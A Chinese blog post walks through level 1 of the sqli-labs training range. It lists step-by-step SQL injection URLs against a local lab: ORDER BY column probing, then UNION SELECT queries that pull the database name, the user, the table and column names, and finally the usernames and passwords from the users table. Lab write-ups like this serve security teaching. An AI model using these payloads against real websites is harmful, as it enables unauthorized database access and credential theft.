sqli-labs靶场通关攻略

于 2024-08-14 20:57:46 发布
阅读量279 收藏 3
点赞数 7
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/141200040
版权

SQL注入

第一关

首先我们进入靶场进入第一关

我们要进行sql注入,先得确定此网站的闭合点

在网址栏后+ /?id=1  回车

判断字段列数 order by

http://127.0.0.1/Less-1/?id=1' order by 1 --+ 页面正常 说明存在1列

http://127.0.0.1/Less-1/?id=1' order by 2 --+ 页面正常 说明存在2列

http://127.0.0.1/Less-1/?id=1' order by 3 --+ 页面正常 说明存在3列

http://127.0.0.1/Less-1/?id=1' order by 4 --+ 页面不正常 说明存在3列

联合查询 查当前数据库名,数据库版本,数据库用户

上面已经查出3列,那么联合查询3列

http://127.0.0.1/Less-1/?id=1' union select 1,2,3 --+ 页面显示的是id=1的数据,没有显示我们联合查询的数据,把人家前面查询的id的数据改成不存在的,比如-1

http://127.0.0.1/Less-1/?id=-1' union select 1,2,3 --+ 此时页面上出现了我们联合查询的回显点

http://127.0.0.1/Less-1/?id=-1' union select 1,database(),user() --+ 联合查询了数据库名和用户

联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

联合查询 查出users表里面的所有列

http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

查询表中所有的数据

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+

那么在此我们第一关的靶场就打完了(未完待续哦,小编会继续努力提升自己,并为大家带来更多更好的文章哦)。

嘤嘤奶嘴酱
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详细sqli-labs(1-65)通关讲解
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2021
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 1422
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1081
Sqli-labs-master靶场1-20通关教程
sqli-labs SQL注入靶场通关手册
2302_78345978的博客
05-18 1680
在name=后加上'and (length(database())=8)--+发送到重映器,进行修改:首先在User-Agent后加 ’ 查看报错信息。因为cookie需要登录才能验证,所以放行,后刷新页面,抓取cookie。进行HTTP User-Agent 注入,选择less-18。进行post传参无回显的布尔类型盲注,选择less-15。(输入账号密码,提交后,在burp上查看截获的数据)先猜数据库名字长度,>=8时不报错,>=9时报错。进行post传参的字符型注入,选择less-13。
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1402
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3630
sqli-labs靶场通关(1-10)
Sqli-labs-master靶场1-23关通关详细教程(基础篇)
一纸荒芜的博客
06-23 5224
Sqli-labs-master靶场1-23关通关详细教程(基础篇)
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 5102
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
Dav_笔记12:Automatic SQL Tuning 之 5 managing SQL Profiles
Dav_2099的博客
08-07 1114
SQL配置文件包含对自动SQL调整期间发现的较差优化程序估计值的更正。此信息可以改进优化器基数和选择性估计,从而导致优化器选择更好的计划。SQL配置文件不包含有关各个执行计划的信息。相反,优化程序在选择计划时具有以下信息源:■环境,包含数据库配置,绑定变量值,优化程序统计信息,数据集等■SQL配置文件中的补充统计信息如果环境或SQL配置文件发生更改,则优化程序可以创建新计划。您可以使用SQL配置文件,无论是否有SQL计划管理。如果使用SQL计划管理,则优化程序选择的计划必须是已启用的计划基准。
数据库:数据定义和数据库的完整性
最新发布
茜茜西西的博客
08-13 545
建立一个数据库XSCJ,自行规定各项参数;建立Course表,录入数据库表中相应元组;修改Course表增加一列,开课学期,数据类型自定义;为Course表的Cname列建立唯一索引,索引名Cname_idx;删除唯一索引Cname_idx;删除基本表Student;删除数据库XSCJ 拓展:创建一个名为BSXT的数据库,初始大小5MB,最大大小10MB,允许数据库自动增长,增长方式按10%比例增长;日志文件初始为2MB,最大可增长到5MB,按1MB增长;将BSXT数据库的主数据文件最大大小改为不限制;
Oracle 19c中的私有临时表
专注于数据库技术分享,包含但不限于Oracle,MySQL,PostgreSQL,ElasticSearch及国产数据库等
08-08 426
Oracle 19c中,私有临时表(Private Temporary Tables, PTTs)是一种新的特性,它提供了一种不同于全局临时表(Global Temporary Tables, GTTs)的临时数据存储机制。私有临时表的设计是为了提高性能和简化临时数据的管理。私有临时表的主要特点包括:会话私有:内存驻留:生命周期管理:定义的私有性:无需显式清理:创建私有临时表可以使用语句,类似于创建普通表,但添加了关键字。例如: 这里指定了在事务提交后保留表中的数据。如果不指定此选项,默认行为是在事务提交
ORACLE 使用CONCAT()函数报错
calabash_man的博客
08-09 244
[TOC](ORACLE 使用CONCAT()函数报错)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值